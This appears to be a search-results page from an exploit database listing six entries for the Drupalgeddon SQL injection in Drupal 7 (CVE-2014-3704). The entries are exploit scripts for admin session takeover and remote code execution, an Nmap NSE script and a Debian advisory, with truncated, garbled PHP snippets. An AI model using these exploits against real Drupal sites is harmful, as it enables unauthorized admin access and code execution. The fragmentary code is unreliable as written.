6 matches found
Drupal 7.0 < 7.31 - Drupalgeddon SQL Injection (Admin Session) Exploit
Exploit for php platform in category web applications //· include 'common.inc'; include 'password.inc'; // set values $username = 'admin'; $url = isset$argv1?$argv1:''; $userid = isset$argv2?intval$argv2:1; if $url == '-h' echo "usage:\n"; echo $argv0.' $url $userid'."\n"; die; if empty$url ||...
http-vuln-cve2014-3704 NSE Script
Exploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions 7.32 of Drupal core are known to be affected. Vulnerability allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. The script injects new Drupal administrator user via login form and the...
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)
//· include 'common.inc'; include 'password.inc'; // set values $username = 'admin'; $url = isset$argv1?$argv1:''; $userid = isset$argv2?intval$argv2:1; if $url == '-h' echo "usage:\n"; echo $argv0.' $url $userid'."\n"; die; if empty$url || strpos$url,'https' === False echo "please state the cook...
Drupal 7.0 7.31 - Drupalgeddon SQL Injection (Remote Code Execution)
Drupal 7.0 7.31 - Drupalgeddon SQL Injection Remote Code Execution // and Stefan Esser //· include 'common.inc'; include 'password.inc'; // set values $userid = 0; $username = ''; $codeinject = 'phpinfo;sessiondestroy;die"";'; $url = isset$argv1?$argv1:''; $code = isset$argv2?$argv2:''; if $url =...
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)
// and Stefan Esser //· include 'common.inc'; include 'password.inc'; // set values $userid = 0; $username = ''; $codeinject = 'phpinfo;sessiondestroy;die"";'; $url = isset$argv1?$argv1:''; $code = isset$argv2?$argv2:''; if $url == '-h' echo "usage:\n"; echo $argv0.' $url $code|$file'."\n"; die; ...
DSA-3051-1 drupal7 - security update
Bulletin has no description...